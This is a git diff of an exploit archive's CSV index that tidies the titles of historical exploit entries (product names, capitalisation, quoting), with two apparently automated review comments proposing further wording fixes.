diff --git a/files.csv b/files.csv
index bb5b4ab5b..8c4747e46 100755
--- a/files.csv
+++ b/files.csv
@@ -207,7 +207,7 @@ id,file,description,date,author,platform,type,port
 214,platforms/windows/dos/214.c,"Microsoft Windows - 'Jolt2.c' Denial of Service",2000-12-02,phonix,windows,dos,0
 215,platforms/linux/local/215.c,"glibc - locale bug mount Exploit",2000-12-02,sk8,linux,local,0
 216,platforms/linux/local/216.c,"dislocate 1.3 - Local i386 Exploit",2000-12-02,"Michel Kaempf",linux,local,0
-217,platforms/linux/local/217.c,"UUCP Exploit - file creation/overwriting (symlinks)",2000-12-04,t--zen,linux,local,0
+217,platforms/linux/local/217.c,"UUCP Exploit - File Creation/Overwriting (symlinks) Exploit",2000-12-04,t--zen,linux,local,0
 218,platforms/linux/local/218.c,"expect (/usr/bin/expect) - Buffer Overflow",2000-12-04,isox,linux,local,0
 219,platforms/linux/local/219.c,"GnomeHack - Local Buffer Overflow (gid=games)",2000-12-04,"Cody Tubbs",linux,local,0
 220,platforms/linux/remote/220.c,"PHP 3.0.16/4.0.2 - Remote Format Overflow",2000-12-06,Gneisenau,linux,remote,80
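Review bot: The new title for id 217 carries "Exploit" twice, once in the product position and once as the suffix: `UUCP Exploit - File Creation/Overwriting (symlinks) Exploit`. The left side of the ` - ` separator holds the affected product in every other row of this hunk, so the first "Exploit" looks like a leftover from the old title. I would write it as `UUCP - File Creation/Overwriting (symlinks) Exploit`, which keeps the row consistent for anyone filtering this index by product name.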
@@ -354,7 +354,7 @@ id,file,description,date,author,platform,type,port
 378,platforms/windows/remote/378.pl,"BlackJumboDog - Remote Buffer Overflow",2004-08-05,"Tal Zeltzer",windows,remote,21
 379,platforms/linux/remote/379.txt,"CVSTrac - Arbitrary Code Execution",2004-08-06,anonymous,linux,remote,0
 380,platforms/linux/remote/380.c,"Pavuk Digest - Authentication Buffer Overflow Remote Exploit",2004-08-08,infamous41md,linux,remote,80
-381,platforms/windows/local/381.c,"Serv-U 3.x < 5.x - Privilege Escalation",2004-08-08,"Andrés Acunha",windows,local,0
+381,platforms/windows/local/381.c,"Serv-U FTP Server 3.x < 5.x - Privilege Escalation",2004-08-08,"Andrés Acunha",windows,local,0
 382,platforms/linux/remote/382.c,"Melange Chat Server 1.10 - Remote Buffer Overflow",2002-12-24,innerphobia,linux,remote,0
 383,platforms/multiple/dos/383.c,"psyBNC 2.3 - Denial of Service",2002-05-19,"Lunar Fault",multiple,dos,31337
 384,platforms/php/webapps/384.txt,"PHP - (php-exec-dir) Patch Command Access Restriction Bypass",2004-08-08,VeNoMouS,php,webapps,0
@@ -394,7 +394,7 @@ id,file,description,date,author,platform,type,port
 423,platforms/windows/dos/423.pl,"Easy File Sharing WebServer 1.25 - Denial of Service",2004-08-27,"GulfTech Security",windows,dos,0
 424,platforms/linux/remote/424.c,"Citadel/UX - Remote Buffer Overflow",2004-08-30,Nebunu,linux,remote,504
 425,platforms/hardware/remote/425.c,"D-Link DCS-900 Camera - Remote IP Address Changer Exploit",2004-08-31,anonymous,hardware,remote,0
-426,platforms/windows/remote/426.c,"TiTan FTP Server - Long Command Heap Overflow (PoC)",2004-08-31,lion,windows,remote,21
+426,platforms/windows/remote/426.c,"Titan FTP Server - Long Command Heap Overflow (PoC)",2004-08-31,lion,windows,remote,21
 427,platforms/windows/dos/427.c,"WFTPD Pro Server 3.21 - MLST Remote Denial of Service",2004-08-31,lion,windows,dos,0
 428,platforms/windows/dos/428.c,"CesarFTP Server - Long Command Denial of Service",2004-08-31,lion,windows,dos,0
 429,platforms/windows/dos/429.c,"Ground Control 1.0.0.7 - (Server/Client) Denial of Service",2004-08-31,"Luigi Auriemma",windows,dos,0
@@ -408,7 +408,7 @@ id,file,description,date,author,platform,type,port
 437,platforms/linux/remote/437.c,"Citadel/UX 6.23 - Remote USER Directive Exploit",2004-09-09,Nebunu,linux,remote,504
 438,platforms/linux/local/438.c,"CDRecord - '$RSH' exec() SUID Shell Creation",2004-09-11,I)ruid,linux,local,0
 439,platforms/windows/remote/439.c,"BlackJumboDog FTP Server 3.6.1 - Remote Buffer Overflow",2004-09-12,Delikon,windows,remote,21
-463,platforms/windows/dos/463.c,"Serv-U < 5.2 - Remote Denial of Service",2004-09-13,str0ke,windows,dos,0
+463,platforms/windows/dos/463.c,"Serv-U FTP Server < 5.2 - Remote Denial of Service",2004-09-13,str0ke,windows,dos,0
 464,platforms/cgi/webapps/464.txt,"Turbo Seek - Null Byte Error Discloses Files",2004-09-13,durito,cgi,webapps,0
 465,platforms/php/webapps/465.pl,"PHP-Nuke - SQL Injection Edit/Save Message(s)",2004-09-16,iko94,php,webapps,0
 466,platforms/linux/local/466.pl,"htpasswd Apache 1.3.31 - Local Exploit",2004-09-16,"Luiz Fernando Camargo",linux,local,0
@@ -471,7 +471,7 @@ id,file,description,date,author,platform,type,port
 607,platforms/windows/dos/607.c,"Flash Messaging 5.2.0g - Remote Denial of Service",2004-03-02,"Luigi Auriemma",windows,dos,0
 608,platforms/linux/remote/608.c,"WvTFTPd 0.9 - Remote Root Heap Overflow",2004-10-28,infamous41md,linux,remote,69
 609,platforms/linux/remote/609.txt,"zgv 5.5 - Multiple Arbitrary Code Execution (PoC)",2004-10-28,infamous41md,linux,remote,0
-611,platforms/windows/dos/611.c,"chesapeake tftp server 1.0 - Directory Traversal / Denial of Service (PoC)",2004-11-01,"Luigi Auriemma",windows,dos,0
+611,platforms/windows/dos/611.c,"Chesapeake TFTP Server 1.0 - Directory Traversal / Denial of Service (PoC)",2004-11-01,"Luigi Auriemma",windows,dos,0
 612,platforms/windows/remote/612.html,"Microsoft Internet Explorer 6 - (IFRAME Tag) Buffer Overflow",2004-11-02,Skylined,windows,remote,0
 616,platforms/windows/remote/616.c,"MiniShare 1.4.1 - Remote Buffer Overflow (1)",2004-11-07,class101,windows,remote,80
 618,platforms/windows/remote/618.c,"Ability Server 2.34 - FTP STOR Buffer Overflow (Unix Exploit)",2004-11-07,NoPh0BiA,windows,remote,21
@@ -644,7 +644,7 @@ id,file,description,date,author,platform,type,port
 818,platforms/php/webapps/818.txt,"vBulletin 3.0.4 - 'forumdisplay.php' Code Execution (1)",2005-02-14,AL3NDALEEB,php,webapps,0
 819,platforms/windows/remote/819.py,"Savant Web Server 3.1 - Remote Buffer Overflow (French Windows OS support)",2005-02-15,"Jerome Athias",windows,remote,80
 820,platforms/php/webapps/820.php,"vBulletin 3.0.4 - 'forumdisplay.php' Code Execution (2)",2005-02-15,AL3NDALEEB,php,webapps,0
-822,platforms/windows/remote/822.c,"Serv-U 4.x - 'site chmod' Remote Buffer Overflow",2004-01-30,Skylined,windows,remote,21
+822,platforms/windows/remote/822.c,"Serv-U FTP Server 4.x - 'site chmod' Remote Buffer Overflow",2004-01-30,Skylined,windows,remote,21
 823,platforms/windows/remote/823.c,"BolinTech Dream FTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String",2004-02-11,Skylined,windows,remote,21
 824,platforms/linux/local/824.c,"VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid)",2005-09-13,Qnix,linux,local,0
 825,platforms/windows/remote/825.c,"3Com FTP Server 2.0 - Remote Overflow",2005-02-17,c0d3r,windows,remote,21
@@ -959,7 +959,7 @@ id,file,description,date,author,platform,type,port
 1154,platforms/linux/local/1154.pl,"Operator Shell (osh) 1.7-13 - Privilege Escalation",2005-08-16,"Charles Stevenson",linux,local,0
 1156,platforms/windows/dos/1156.c,"Chris Moneymakers World Poker Championship 1.0 - Denial of Service",2005-08-17,"Luigi Auriemma",windows,dos,0
 1157,platforms/cgi/dos/1157.pl,"GTChat 0.95 Alpha - Remote Denial of Service",2005-08-18,RusH,cgi,dos,0
-1158,platforms/windows/dos/1158.pl,"WS_FTP Server 5.03 - (RNFR) Buffer Overflow",2004-11-29,"Reed Arvin",windows,dos,0
+1158,platforms/windows/dos/1158.pl,"Ipswitch WS_FTP Server 5.03 - (RNFR) Buffer Overflow",2004-11-29,"Reed Arvin",windows,dos,0
 1159,platforms/windows/dos/1159.pl,"Mercury/32 Mail Server 4.01a - (check) Buffer Overflow",2004-12-01,"Reed Arvin",windows,dos,0
 1160,platforms/windows/dos/1160.pl,"Golden FTP Server Pro 2.52 - (USER) Remote Buffer Overflow",2005-04-27,"Reed Arvin",windows,dos,0
 1161,platforms/windows/local/1161.c,"BakBone NetVault 7.1 - Privilege Escalation",2005-04-27,"Reed Arvin",windows,local,0
@@ -1043,7 +1043,7 @@ id,file,description,date,author,platform,type,port
 1247,platforms/linux/remote/1247.pl,"phpBB 2.0.13 - (admin_styles.php) Remote Command Execution",2005-10-11,RusH,linux,remote,0
 1248,platforms/solaris/local/1248.pl,"Solaris 10 (x86) - DtPrintinfo/Session Privilege Escalation",2005-10-12,"Charles Stevenson",solaris,local,0
 1250,platforms/php/webapps/1250.php,"w-Agora 4.2.0 - (quicklist.php) Remote Code Execution",2005-10-14,rgod,php,webapps,0
-1251,platforms/windows/dos/1251.pl,"TYPSoft FTP Server 1.11 - (RETR) Denial of Service",2005-10-14,wood,windows,dos,0
+1251,platforms/windows/dos/1251.pl,"TYPSoft FTP Server 1.11 - 'RETR' Denial of Service",2005-10-14,wood,windows,dos,0
 1252,platforms/asp/webapps/1252.htm,"MuOnline Loopholes Web Server - 'pkok.asp' SQL Injection",2005-10-15,nukedx,asp,webapps,0
 1253,platforms/multiple/dos/1253.html,"Mozilla (Firefox 1.0.7) (Thunderbird 1.0.6) - Denial of Service",2005-10-16,posidron,multiple,dos,0
 1254,platforms/multiple/dos/1254.html,"Opera 8.02 - Remote Denial of Service (1)",2005-10-16,posidron,multiple,dos,0
@@ -1295,7 +1295,7 @@ id,file,description,date,author,platform,type,port
 1549,platforms/php/webapps/1549.php,"PHP-Stats 0.1.9.1 - Remote Commands Execution Exploit",2006-03-04,rgod,php,webapps,0
 1550,platforms/asp/webapps/1550.txt,"TotalECommerce 1.0 - (index.asp id) SQL Injection",2006-03-04,nukedx,asp,webapps,0
 1551,platforms/hardware/dos/1551.txt,"Multiple Routers - (IRC Request) Disconnect Denial of Service",2006-03-04,"Ryan Meyer",hardware,dos,0
-1552,platforms/windows/dos/1552.pl,"XM Easy Personal FTP Server 1.0 - (Port) Remote Overflow (PoC)",2006-03-04,luka.research,windows,dos,0
+1552,platforms/windows/dos/1552.pl,"XM Easy Personal FTP Server 1.0 - 'Port' Remote Overflow (PoC)",2006-03-04,luka.research,windows,dos,0
 1553,platforms/php/webapps/1553.pl,"Fantastic News 2.1.2 - (script_path) Remote Code Execution",2006-03-04,uid0,php,webapps,0
 1554,platforms/multiple/local/1554.c,"LibTiff 3.7.1 - (BitsPerSample Tag) Local Buffer Overflow",2006-03-05,"Agustin Gianni",multiple,local,0
 1555,platforms/windows/local/1555.c,"Microsoft Visual Studio 6.0 sp6 - '.dbp' Buffer Overflow",2006-03-05,Kozan,windows,local,0
@@ -1465,7 +1465,7 @@ id,file,description,date,author,platform,type,port
 1744,platforms/php/webapps/1744.pl,"Albinator 2.0.6 - (Config_rootdir) Remote File Inclusion",2006-05-03,webDEViL,php,webapps,0
 1746,platforms/linux/dos/1746.pl,"zawhttpd 0.8.23 - (GET) Remote Buffer Overflow Denial of Service",2006-05-04,"Kamil Sienicki",linux,dos,0
 1747,platforms/php/webapps/1747.pl,"Auction 1.3m - 'phpbb_root_path' Remote File Inclusion",2006-05-04,webDEViL,php,webapps,0
-1748,platforms/windows/dos/1748.py,"XM Easy Personal FTP Server 4.3 - (USER) Remote Buffer Overflow (PoC)",2006-05-04,rewterz,windows,dos,0
+1748,platforms/windows/dos/1748.py,"XM Easy Personal FTP Server 4.3 - 'USER' Remote Buffer Overflow (PoC)",2006-05-04,rewterz,windows,dos,0
 1749,platforms/windows/dos/1749.pl,"acFTP FTP Server 1.4 - (USER) Remote Buffer Overflow (PoC)",2006-05-04,Preddy,windows,dos,0
 1750,platforms/linux/remote/1750.c,"Quake 3 Engine 1.32b - R_RemapShader() Remote Client Buffer Overflow",2006-05-05,landser,linux,remote,0
 1751,platforms/php/webapps/1751.php,"Limbo CMS 1.0.4.2 - 'catid' SQL Injection",2006-05-05,[Oo],php,webapps,0
@@ -1660,7 +1660,7 @@ id,file,description,date,author,platform,type,port
 1946,platforms/php/webapps/1946.php,"Jaws 0.6.2 - (Search gadget) SQL Injection",2006-06-23,rgod,php,webapps,0
 1947,platforms/multiple/dos/1947.c,"BitchX 1.1-final - do_hook() Remote Denial of Service",2006-06-24,"Federico L. Bossi Bonin",multiple,dos,0
 1948,platforms/php/webapps/1948.txt,"phpMySms 2.0 - 'ROOT_PATH' Remote File Inclusion",2006-06-24,Persian-Defacer,php,webapps,0
-1949,platforms/windows/dos/1949.pl,"XM Easy Personal FTP Server 5.0.1 - (Port) Remote Overflow (PoC)",2006-06-24,"Jerome Athias",windows,dos,0
+1949,platforms/windows/dos/1949.pl,"XM Easy Personal FTP Server 5.0.1 - 'Port' Remote Overflow (PoC)",2006-06-24,"Jerome Athias",windows,dos,0
 1950,platforms/php/webapps/1950.pl,"MyBulletinBoard (MyBB) 1.1.3 - (usercp.php) Create Admin Exploit",2006-06-25,Hessam-x,php,webapps,0
 1951,platforms/php/webapps/1951.txt,"MagNet BeeHive CMS (header) - Remote File Inclusion",2006-06-25,Kw3[R]Ln,php,webapps,0
 1952,platforms/php/webapps/1952.txt,"THoRCMS 1.3.1 - 'phpbb_root_path' Remote File Inclusion",2006-06-25,Kw3[R]Ln,php,webapps,0
@@ -2629,7 +2629,7 @@ id,file,description,date,author,platform,type,port
 2949,platforms/multiple/dos/2949.c,"Intel 2200BG 802.11 - Beacon frame Kernel Memory Corruption",2006-12-19,"Breno Silva Pinto",multiple,dos,0
 2950,platforms/windows/local/2950.c,"DeepBurner 1.8.0 - '.dbr' File Parsing Buffer Overflow",2006-12-19,Expanders,windows,local,0
 2951,platforms/multiple/remote/2951.sql,"Oracle 9i / 10g (extproc) - Local+Remote Command Execution",2006-12-19,"Marco Ivaldi",multiple,remote,0
-2952,platforms/windows/dos/2952.py,"WinFtp Server 2.0.2 - (PASV) Remote Denial of Service",2006-12-19,shinnai,windows,dos,0
+2952,platforms/windows/dos/2952.py,"WinFTP Server 2.0.2 - (PASV) Remote Denial of Service",2006-12-19,shinnai,windows,dos,0
 2953,platforms/php/webapps/2953.php,"PHP-Update 2.7 - extract() Authentication Bypass / Shell Inject Exploit",2006-12-19,rgod,php,webapps,0
 2954,platforms/linux/dos/2954.html,"KDE 3.5 - (libkhtml) 4.2.0 / Unhandled HTML Parse Exception Exploit",2006-12-19,"Federico L. Bossi Bonin",linux,dos,0
 2955,platforms/php/webapps/2955.txt,"Paristemi 0.8.3b - (buycd.php) Remote File Inclusion",2006-12-19,nuffsaid,php,webapps,0
@@ -2649,13 +2649,13 @@ id,file,description,date,author,platform,type,port
 2969,platforms/php/webapps/2969.txt,"PHP/Mysql Site Builder 0.0.2 - (htm2PHP.php) File Disclosure",2006-12-21,"the master",php,webapps,0
 2970,platforms/php/webapps/2970.txt,"Newxooper-PHP 0.9.1 - (mapage.php) Remote File Inclusion",2006-12-21,3l3ctric-Cracker,php,webapps,0
 2971,platforms/php/webapps/2971.txt,"PgmReloaded 0.8.5 - Multiple Remote File Inclusion",2006-12-21,nuffsaid,php,webapps,0
-2972,platforms/windows/dos/2972.c,"DREAM FTP Server 1.0.2 - (PORT) Remote Denial of Service",2006-12-21,InTeL,windows,dos,0
+2972,platforms/windows/dos/2972.c,"Dream FTP Server 1.0.2 - (PORT) Remote Denial of Service",2006-12-21,InTeL,windows,dos,0
 2973,platforms/php/webapps/2973.txt,"PowerClan 1.14a - (footer.inc.php) Remote File Inclusion",2006-12-21,nuffsaid,php,webapps,0
 2974,platforms/windows/remote/2974.pl,"Http explorer Web Server 1.02 - Directory Traversal",2006-12-21,str0ke,windows,remote,0
 2975,platforms/php/webapps/2975.pl,"Ixprim CMS 1.2 - Blind SQL Injection",2006-12-21,DarkFig,php,webapps,0
 2976,platforms/php/webapps/2976.txt,"inertianews 0.02b - (inertianews_main.php) Remote File Inclusion",2006-12-21,bd0rk,php,webapps,0
 2977,platforms/php/webapps/2977.txt,"MKPortal M1.1.1 - 'Urlobox' Cross-Site Request Forgery",2006-12-21,Demential,php,webapps,0
-2978,platforms/windows/dos/2978.py,"XM Easy Personal FTP Server 5.2.1 - (USER) Format String Denial of Service",2006-12-22,shinnai,windows,dos,0
+2978,platforms/windows/dos/2978.py,"XM Easy Personal FTP Server 5.2.1 - 'USER' Format String Denial of Service",2006-12-22,shinnai,windows,dos,0
 2979,platforms/php/webapps/2979.txt,"KISGB 5.1.1 - (Authenticate.php) Remote File Inclusion",2006-12-22,mdx,php,webapps,0
 2980,platforms/php/webapps/2980.txt,"EternalMart Guestbook 1.10 - (admin/auth.php) Remote File Inclusion",2006-12-22,mdx,php,webapps,0
 2981,platforms/php/webapps/2981.php,"open NewsLetter 2.5 - Multiple Vulnerabilities 
(2)",2006-12-23,BlackHawk,php,webapps,0
@@ -2857,7 +2857,7 @@ id,file,description,date,author,platform,type,port
 3179,platforms/multiple/local/3179.txt,"Oracle 10g - SYS.KUPV$FT.ATTACH_JOB PL / SQL Injection",2007-01-23,"Joxean Koret",multiple,local,0
 3180,platforms/php/webapps/3180.pl,"Vote-Pro 4.0 - (poll_frame.php poll_id) Remote Code Execution",2007-01-23,r0ut3r,php,webapps,0
 3181,platforms/osx/local/3181.rb,"Apple Mac OSX 10.4.8 - 'UserNotificationCenter' Privilege Escalation",2007-01-23,MoAB,osx,local,0
-3182,platforms/windows/dos/3182.py,"Sami HTTP Server 2.0.1 - (HTTP 404 Object not found) Denial of Service",2007-01-23,shinnai,windows,dos,0
+3182,platforms/windows/dos/3182.py,"Sami HTTP Server 2.0.1 - HTTP 404 Object not found Denial of Service",2007-01-23,shinnai,windows,dos,0
 3183,platforms/php/webapps/3183.txt,"BBClone 0.31 - (selectlang.php) Remote File Inclusion",2007-01-23,3l3ctric-Cracker,php,webapps,0
 3184,platforms/php/webapps/3184.txt,"phpXD 0.3 - (path) Remote File Inclusion",2007-01-23,3l3ctric-Cracker,php,webapps,0
 3185,platforms/php/webapps/3185.txt,"RPW 1.0.2 - (config.php sql_language) Remote File Inclusion",2007-01-24,3l3ctric-Cracker,php,webapps,0
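Review bot: The new title for id 3182 drops the parentheses without putting anything in their place, so `HTTP 404 Object not found Denial of Service` reads as one run of words with no boundary between the trigger and the impact. Other hunks in this commit (ids 1251, 1552 and 1748) replace `(X)` with `'X'`, and the same convention fits here: `Sami HTTP Server 2.0.1 - 'HTTP 404 Object not found' Denial of Service`. Quoting the trigger also keeps the title consistent for anyone matching on the quoted component when triaging entries from this index.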
@@ -3013,7 +3013,7 @@ id,file,description,date,author,platform,type,port
 3338,platforms/php/webapps/3338.php,"NukeSentinel 2.5.05 - (nukesentinel.php) File Disclosure",2007-02-20,DarkFig,php,webapps,0
 3339,platforms/asp/webapps/3339.txt,"Online Web Building 2.0 - 'id' SQL Injection",2007-02-20,"Mehmet Ince",asp,webapps,0
 3340,platforms/windows/remote/3340.html,"Mozilla Firefox 2.0.0.1 - (location.hostname) Cross-Domain",2007-02-20,"Michal Zalewski",windows,remote,0
-3341,platforms/windows/dos/3341.cpp,"TurboFTP 5.30 Build 572 - 'newline/LIST' Multiple Remote Denial of Service",2007-02-20,Marsu,windows,dos,0
+3341,platforms/windows/dos/3341.cpp,"TurboFTP Server 5.30 Build 572 - 'newline/LIST' Multiple Remote Denial of Service",2007-02-20,Marsu,windows,dos,0
 3342,platforms/windows/local/3342.c,"News Rover 12.1 Rev 1 - Remote Stack Overflow (1)",2007-02-20,Marsu,windows,local,0
 3343,platforms/windows/dos/3343.cpp,"FTP Voyager 14.0.0.3 - (CWD) Remote Stack Overflow (PoC)",2007-02-20,Marsu,windows,dos,0
 3344,platforms/php/webapps/3344.pl,"PHP-Nuke 8.0 Final - (INSERT) Blind SQL Injection (MySQL)",2007-02-20,krasza,php,webapps,0
@@ -3056,7 +3056,7 @@ id,file,description,date,author,platform,type,port
 3382,platforms/php/webapps/3382.txt,"Admin Phorum 3.3.1a - (del.php include_path) Remote File Inclusion",2007-02-27,GoLd_M,php,webapps,0
 3383,platforms/plan9/local/3383.c,"Plan 9 Kernel - 'devenv.c OTRUNC/pwrite' Local Exploit",2007-02-28,"Don Bailey",plan9,local,0
 3384,platforms/linux/local/3384.c,"Apache 1.3.33/1.3.34 (Ubuntu / Debian) - (CGI TTY) Privilege Escalation",2007-02-28,"Kristian Hermansen",linux,local,0
-3385,platforms/windows/dos/3385.pl,"XM Easy Personal FTP Server 5.30 - (ABOR) Format String Denial of Service",2007-02-28,"Umesh Wanve",windows,dos,0
+3385,platforms/windows/dos/3385.pl,"XM Easy Personal FTP Server 5.30 - 'ABOR' Format String Denial of Service",2007-02-28,"Umesh Wanve",windows,dos,0
 3386,platforms/osx/local/3386.pl,"McAfee VirusScan for Mac (Virex) 7.7 - Privilege Escalation",2007-02-28,"Kevin Finisterre",osx,local,0
 3387,platforms/php/webapps/3387.php,"vBulletin 3.6.4 - (inlinemod.php postids) SQL Injection",2007-02-28,rgod,php,webapps,0
 3388,platforms/windows/remote/3388.pl,"3Com TFTP Service 2.0.1 - (Long Transporting Mode) Exploit (Perl)",2007-02-28,"Umesh Wanve",windows,remote,69
@@ -3703,7 +3703,7 @@ id,file,description,date,author,platform,type,port
 4043,platforms/windows/remote/4043.html,"Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow 2",2007-06-07,Excepti0n,windows,remote,0
 4044,platforms/windows/dos/4044.txt,"Microsoft Windows GDI+ - ICO File Remote Denial of Service",2007-06-07,Kad,windows,dos,0
 4045,platforms/windows/remote/4045.py,"Microsoft Windows - Animated Cursor Stack Overflow",2007-06-07,"RISE Security",windows,remote,0
-4046,platforms/windows/dos/4046.pl,"MiniWeb Http Server 0.8.x - Remote Denial of Service",2007-06-07,gbr,windows,dos,0
+4046,platforms/windows/dos/4046.pl,"MiniWeb HTTP Server 0.8.x - Remote Denial of Service",2007-06-07,gbr,windows,dos,0
 4047,platforms/windows/dos/4047.c,"SafeNet High Assurance Remote 1.4.0 - (IPSecDrv.sys) Remote Denial of Service",2007-06-08,mu-b,windows,dos,0
 4049,platforms/windows/remote/4049.html,"Zenturi ProgramChecker - ActiveX Multiple Insecure Methods",2007-06-08,shinnai,windows,remote,0
 4050,platforms/windows/remote/4050.html,"Zenturi ProgramChecker - ActiveX NavigateUrl() Insecure Method Exploit",2007-06-08,shinnai,windows,remote,0
@@ -4955,7 +4955,7 @@ id,file,description,date,author,platform,type,port
 5314,platforms/windows/remote/5314.py,"TFTP Server 1.4 - ST Buffer Overflow",2008-03-26,muts,windows,remote,69
 5315,platforms/windows/remote/5315.py,"Quick TFTP Pro 2.1 - Remote SEH Overflow",2008-03-26,muts,windows,remote,69
 5316,platforms/windows/dos/5316.py,"PacketTrap Networks pt360 2.0.39 TFTPD - Remote Denial of Service",2008-03-26,muts,windows,dos,0
-5317,platforms/php/webapps/5317.txt,"JAF-CMS 4.0 RC2 - Multiple Remote File Inclusion",2008-03-26,CraCkEr,php,webapps,0
+5317,platforms/php/webapps/5317.txt,"JAF CMS 4.0 RC2 - Multiple Remote File Inclusion",2008-03-26,CraCkEr,php,webapps,0
 5318,platforms/php/webapps/5318.txt,"Joomla! Component MyAlbum 1.0 - (album) SQL Injection",2008-03-28,parad0x,php,webapps,0
 5319,platforms/php/webapps/5319.pl,"AuraCMS 2.x - (user.php) Security Code Bypass / Add Administrator Exploit",2008-03-28,NTOS-Team,php,webapps,0
 5320,platforms/windows/local/5320.txt,"Microsoft Office XP SP3 - PPT File Buffer Overflow (MS08-016)",2008-03-30,Marsu,windows,local,0
@@ -5075,7 +5075,7 @@ id,file,description,date,author,platform,type,port
 5435,platforms/php/webapps/5435.txt,"Joomla! Component com_extplorer 2.0.0 RC2 - Local Directory Traversal",2008-04-13,Houssamix,php,webapps,0
 5436,platforms/php/webapps/5436.txt,"Pollbooth 2.0 - (pollID) SQL Injection",2008-04-13,S@BUN,php,webapps,0
 5437,platforms/php/webapps/5437.txt,"cpcommerce 1.1.0 - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities",2008-04-13,BugReport.IR,php,webapps,0
-5438,platforms/windows/dos/5438.py,"XM Easy Personal FTP Server 5.4.0 - (XCWD) Denial of Service",2008-04-13,j0rgan,windows,dos,0
+5438,platforms/windows/dos/5438.py,"XM Easy Personal FTP Server 5.4.0 - 'XCWD' Denial of Service",2008-04-13,j0rgan,windows,dos,0
 5439,platforms/php/webapps/5439.txt,"PostCard 1.0 - Remote Insecure Cookie Handling",2008-04-13,t0pP8uZz,php,webapps,0
 5440,platforms/php/webapps/5440.php,"Mumbo Jumbo Media OP4 - Blind SQL Injection",2008-04-13,Lidloses_Auge,php,webapps,0
 5441,platforms/php/webapps/5441.txt,"SmallBiz 4 Seasons CMS - SQL Injection",2008-04-14,cO2,php,webapps,0
@@ -5898,7 +5898,7 @@ id,file,description,date,author,platform,type,port
 6301,platforms/php/webapps/6301.txt,"EZContents CMS 2.0.3 - Multiple Local File Inclusion",2008-08-25,DSecRG,php,webapps,0
 6302,platforms/windows/remote/6302.pl,"Dana IRC 1.4a - Remote Buffer Overflow",2008-08-25,"Guido Landi",windows,remote,0
 6303,platforms/php/webapps/6303.txt,"WebBoard 2.0 - Arbitrary SQL Question/Anwser Delete",2008-08-25,t0pP8uZz,php,webapps,0
-6305,platforms/hardware/remote/6305.htm,"Belkin wireless G router + ADSL2 modem - Authentication Bypass",2008-08-25,noensr,hardware,remote,0
+6305,platforms/hardware/remote/6305.htm,"Belkin Wireless G router + ADSL2 modem - Authentication Bypass",2008-08-25,noensr,hardware,remote,0
 6306,platforms/php/webapps/6306.pl,"GeekLog 1.5.0 - Arbitrary File Upload",2008-08-25,t0pP8uZz,php,webapps,0
 6307,platforms/php/webapps/6307.txt,"Crafty Syntax Live Help 2.14.6 - (department) SQL Injection",2008-08-25,"GulfTech Security",php,webapps,0
 6309,platforms/php/webapps/6309.txt,"z-breaknews 2.0 - (single.php) SQL Injection",2008-08-26,cOndemned,php,webapps,0
@@ -6235,8 +6235,8 @@ id,file,description,date,author,platform,type,port
 6657,platforms/php/webapps/6657.pl,"IP Reg 0.4 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0
 6658,platforms/windows/dos/6658.txt,"VBA32 Personal AntiVirus 3.12.8.x - (malformed archive) Denial of Service",2008-10-03,LiquidWorm,windows,dos,0
 6659,platforms/php/webapps/6659.txt,"Full PHP Emlak Script - 'arsaprint.php id' SQL Injection",2008-10-03,"Hussin X",php,webapps,0
-6660,platforms/windows/dos/6660.txt,"Serv-U 7.3 - Authenticated (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0
-6661,platforms/windows/remote/6661.txt,"Serv-U 7.3 - Authenticated Remote FTP File Replacement",2008-10-03,dmnt,windows,remote,0
+6660,platforms/windows/dos/6660.txt,"Serv-U FTP Server 7.3 - Authenticated (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0
+6661,platforms/windows/remote/6661.txt,"Serv-U FTP Server 7.3 - Authenticated Remote FTP File Replacement",2008-10-03,dmnt,windows,remote,0
 6662,platforms/php/webapps/6662.pl,"AdaptCMS Lite 1.3 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0
 6663,platforms/php/webapps/6663.txt,"CCMS 3.1 - (skin) Multiple Local File Inclusion",2008-10-03,SirGod,php,webapps,0
 6664,platforms/php/webapps/6664.txt,"Kwalbum 2.0.2 - Arbitrary File Upload",2008-10-03,"CWH Underground",php,webapps,0
@@ -6290,7 +6290,7 @@ id,file,description,date,author,platform,type,port
 6714,platforms/php/webapps/6714.pl,"Stash 1.0.3 - (SQL Injection) User Credentials Disclosure",2008-10-09,gnix,php,webapps,0
 6715,platforms/php/webapps/6715.txt,"Scriptsez Easy Image Downloader - Local File Download",2008-10-09,JosS,php,webapps,0
 6716,platforms/windows/dos/6716.pl,"Microsoft Windows GDI+ - PoC (MS08-052) (2)",2008-10-09,"John Smith",windows,dos,0
-6717,platforms/windows/dos/6717.py,"WinFTP 2.3.0 - (PASV mode) Remote Denial of Service",2008-10-09,dmnt,windows,dos,0
+6717,platforms/windows/dos/6717.py,"WinFTP Server 2.3.0 - (PASV mode) Remote Denial of Service",2008-10-09,dmnt,windows,dos,0
 6718,platforms/linux/dos/6718.html,"Konqueror 3.5.9 - (load) Remote Crash",2008-10-10,"Jeremy Brown",linux,dos,0
 6719,platforms/windows/dos/6719.py,"Noticeware E-mail Server 5.1.2.2 - (POP3) Unauthenticated Denial of Service",2008-10-10,rAWjAW,windows,dos,0
 6720,platforms/asp/webapps/6720.txt,"Ayco Okul Portali - (linkid) SQL Injection (tr)",2008-10-10,Crackers_Child,asp,webapps,0
@@ -6325,7 +6325,7 @@ id,file,description,date,author,platform,type,port
 6750,platforms/hardware/remote/6750.txt,"Telecom Italia Alice Pirelli routers - Backdoor from internal LAN/WAN",2008-10-14,"saxdax & drpepperONE",hardware,remote,0
 6751,platforms/php/webapps/6751.txt,"SezHoo 0.1 - (IP) Remote File Inclusion",2008-10-14,DaRkLiFe,php,webapps,0
 6752,platforms/windows/dos/6752.pl,"Eserv 3.x - FTP Server (ABOR) Remote Stack Overflow (PoC)",2008-10-14,LiquidWorm,windows,dos,0
-6753,platforms/windows/dos/6753.py,"Titan FTP server 6.26 build 630 - Remote Denial of Service",2008-10-14,dmnt,windows,dos,0
+6753,platforms/windows/dos/6753.py,"Titan FTP Server 6.26 build 630 - Remote Denial of Service",2008-10-14,dmnt,windows,dos,0
